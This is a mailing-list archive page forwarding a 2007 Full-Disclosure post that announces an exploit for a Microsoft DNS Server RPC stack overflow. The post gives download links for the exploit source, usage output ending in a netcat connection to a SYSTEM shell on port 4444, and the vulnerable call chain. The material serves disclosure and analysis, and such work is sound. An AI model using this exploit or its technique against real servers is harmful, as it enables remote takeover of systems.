Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

   


   


   

















      :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: Microsoft DNS Server Remote Code executionExploit and analysis



     

> -----Original Message-----
> From: full-disclosure-bounces@xxxxxxxxxxxxxxxxx 
> [mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx] On Behalf 
> Of Andres Tarasco
> Sent: Monday, April 16, 2007 6:53 AM
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Subject: [Full-disclosure] Microsoft DNS Server Remote Code 
> executionExploit and analysis
> 
> Hi,
> 
> im sending you the headers of the new exploit code for 
> microsoft DNS servers. You can download the full source code 
> exploit and analysis at:
> 
> - http://www.514.es/Microsoft_Dns_Server_Exploit.zip 
> <http://www.514.es/Microsoft_Dns_Server_Exploit.zip> 
> or
> - http://www.48bits.com/exploits/dnsxpl.rar
> 
> 
>  Microsoft DNS Server Remote Code execution Exploit and analysis 
>    Advisory: 
> http://www.microsoft.com/technet/security/advisory/935964.mspx
>    This remote exploit works against port 445 (also Microsoft 
> RPC api used) 
> 
>   Author:
>   * Mario Ballano  ( mballano~gmail.com )  
>   * Andres Tarasco ( atarasco~gmail.com )
>    
>   Timeline:
>   * April,12,2007: Microsoft advisory published
>   * April,13,2007: POC Exploit coded 
>   * April,14,2007: Microsoft notified about a new attack 
> vector against port 445 (this exploit code)
>   * April,14,2007: Working exploit for Windows 2000 server 
> SP4 (Spanish)
>   * April,15,2007: Working exploit for Windows 2003 server 
> SP2 (Spanish) /GS bypassed 
>   * April,16,2007: hackers hax the w0rld and got busted.
>   * April,xx,2007: Lammer release the first buggy worm
>   * Xxxxx,xx,2007: Finally it was true. Nacked photos of Gary 
> m.. being abducted were found at NSA servers 
>   
>   
>   Usage:
>   D:\DNSTEST>dnstest.exe 192.168.1.7
>     -------------------------------------------------------
>     Microsoft Dns Server local & remote RPC Exploit code (port 445) 
>     Exploit code by Andres Tarasco & Mario Ballano
>     Tested against Windows 2000 server SP4 and Windows 2003 
> SP2 (Spanish)
>     -------------------------------------------------------
> 
>    [+] Trying to fingerprint target.. 05 02 
>    [+] Remote Host identified as Windows 2003
>    [+] Connecting to 
> 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_np:192.168.1.7[\\pi
> pe\\dnsserver]
>    [+] RpcBindingFromStringBinding returned 0x0
>    [+] Calling remote procedure DnssrvOperation() 
>    [+] Now try to connect to port 4444
> 
>   D:\DNSTEST>nc 192.168.1.7 4444
>    Microsoft Windows [Version 5.2.3790]
>    (C) Copyright 1985-2003 Microsoft Corp.
> 
>    C:\WINDOWS\system32>whoami 
>    nt authority\system  
> 
>   Vulnerability Analysis:
> 
>   The function Lookup_ZoneTreeNodeFromDottedName() uses a 
> fixed local buffer to convert
>   a string calling Name_ConvertFileNameToCountName(), this 
> string can contain back-slash 
>   octal characters. Although some bounds checks are done when 
> writting to the buffer is 
>   still possible to bypass them using a string with multiple 
> backslashed chars, resulting
>   in a stack based buffer overflow. 
> 
>   This function can be reached through DNS RPC Interface, the 
> execution flow 
>   will be as follows:
> 
>   R_DnssrvQuery(pa,buggybuffer,pc,DesiredAccess,pd);          
>         // RPC Exported function
>   R_DnssrvQuery2(0,0,pa,buggybuffer,pc,DesiredAccess,pd);      
>   RpcUtil_FindZone(buggybuffer,1,DesiredAccess);  
>   Zone_FindZoneByName(buggybuffer);                           
>         // Here we go!
>   Lookup_ZoneTreeNodeFromDottedName(buggybuffer,0,0x2000000);
>             
> Name_ConvertFileNameToCountName(localbuffer,buggybuffer,0); 
> // Using fixed size local buffer 
>                     extractQuotedChar(x,x,buggybuffer);       
>         // Extract octal number           
>   Disassemblies at the end of the code:
> 
>   References:
>   - Defeating the Stack Based Buffer Overflow Prevention 
> Mechanism of Microsoft Windows 2003 Server. (David 
> Litchfield, NGSSoftware). 
>   - www.48bits.com
>   - http://www.514.es
> 
>   Just compile the code with nmake and have fun!
> 
> 
> */ 
> 
> 



 




Copyright © Lexa Software, 1996-2009.